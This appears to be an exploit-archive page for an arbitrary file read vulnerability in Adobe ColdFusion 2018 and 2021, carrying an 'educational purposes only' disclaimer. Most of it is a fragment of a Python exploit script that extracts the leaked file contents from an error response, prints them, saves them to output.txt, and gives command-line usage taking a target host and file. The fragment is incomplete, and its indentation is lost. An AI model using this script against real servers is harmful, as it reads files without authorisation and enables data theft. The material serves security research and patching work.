Adobe coldfusion versions 2018,15 (and earlier) and 2021,5 and earlier arbitrary file read Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-03-11 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Adobe coldfusion versions 2018,15 (and earlier) and 2021,5 and earlier arbitrary file read is for educational purposes only and if it is used you will do on your own risk!
if response.status_code in [404, 500] and splatter in response.text:
file_data = response.text.split(splatter, 1)[0]
if file_data is None:
raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')
print(file_data)
# Save the output to a file
output_file_name = 'output.txt'
with open(output_file_name, 'w') as output_file:
output_file.write(file_data)
print(f"The output saved to {output_file_name}")
if __name__ == "__main__":
if not 3 <= len(sys.argv) <= 5:
print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
sys.exit(1)